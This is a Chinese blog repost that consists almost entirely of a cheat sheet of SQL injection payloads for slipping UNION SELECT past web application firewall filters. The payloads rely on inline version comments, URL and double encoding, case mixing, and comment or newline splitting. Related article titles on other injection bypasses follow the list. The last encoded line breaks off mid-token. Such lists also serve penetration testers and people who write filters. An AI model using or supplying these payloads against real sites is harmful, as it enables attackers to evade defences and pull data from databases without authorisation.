sql注入绕过union select过滤

Posted FireC@t @ Perl6

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了sql注入绕过union select过滤相关的知识,希望对你有一定的参考价值。

  1 #
  2 #
  3 #
  4 #WAF Bypassing Strings:
  5  
  6  /*!%55NiOn*/ /*!%53eLEct*/
  7  
  8  %55nion(%53elect 1,2,3)-- -
  9  
 10  +union+distinct+select+
 11  
 12  +union+distinctROW+select+
 13  
 14  /**//*!12345UNION SELECT*//**/
 15  
 16  /**//*!50000UNION SELECT*//**/
 17  
 18  /**/UNION/**//*!50000SELECT*//**/
 19  
 20  /*!50000UniON SeLeCt*/
 21  
 22  union /*!50000%53elect*/
 23  
 24  +#uNiOn+#sEleCt
 25  
 26  +#1q%0AuNiOn all#qa%0A#%0AsEleCt
 27  
 28  /*!%55NiOn*/ /*!%53eLEct*/
 29  
 30  /*!u%6eion*/ /*!se%6cect*/
 31  
 32  +un/**/ion+se/**/lect
 33  
 34  uni%0bon+se%0blect
 35  
 36  %2f**%2funion%2f**%2fselect
 37  
 38  union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
 39  
 40  REVERSE(noinu)+REVERSE(tceles)
 41  
 42  /*--*/union/*--*/select/*--*/
 43  
 44  union (/*!/**/ SeleCT */ 1,2,3)
 45  
 46  /*!union*/+/*!select*/
 47  
 48  union+/*!select*/
 49  
 50  /**/union/**/select/**/
 51  
 52  /**/uNIon/**/sEleCt/**/
 53  
 54  /**//*!union*//**//*!select*//**/
 55  
 56  /*!uNIOn*/ /*!SelECt*/
 57  
 58  +union+distinct+select+
 59  
 60  +union+distinctROW+select+
 61  
 62  +UnIOn%0d%0aSeleCt%0d%0a
 63  
 64  UNION/*&test=1*/SELECT/*&pwn=2*/
 65  
 66  un?+un/**/ion+se/**/lect+
 67  
 68  +UNunionION+SEselectLECT+
 69  
 70  +uni%0bon+se%0blect+
 71  
 72  %252f%252a*/union%252f%252a /select%252f%252a*/
 73  
 74  /%2A%2A/union/%2A%2A/select/%2A%2A/
 75  
 76  %2f**%2funion%2f**%2fselect%2f**%2f
 77  
 78  union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
 79  
 80  /*!UnIoN*/SeLecT+
 81  
 82 ##
 83 #
 84 #
 85 #Union Select by PASS with Url Encoded Method:
 86  
 87    %55nion(%53elect)
 88  
 89    union%20distinct%20select
 90  
 91    union%20%64istinctRO%57%20select
 92  
 93    union%2053elect
 94  
 95    %23?%0auion%20?%23?%0aselect
 96  
 97    %23?zen?%0Aunion all%23zen%0A%23Zen%0Aselect
 98  
 99    %55nion %53eLEct
100  
101    u%6eion se%6cect
102  
103    unio%6e %73elect
104  
105    unio%6e%20%64istinc%74%20%73elect
106  
107    uni%6fn distinct%52OW s%65lect
108  
109    %75%6e%6f%69%6e %61%6c%6c %73%65%6c%65%63%7

 

以上是关于sql注入绕过union select过滤的主要内容,如果未能解决你的问题,请参考以下文章

SQL注入 union和select替换为空绕过

sql注入 form过滤怎么绕过

渗透测试自学系列— SQL注入 之 绕过技巧

跟着师傅学代码审计

SQL注入绕过总结

sql绕过基础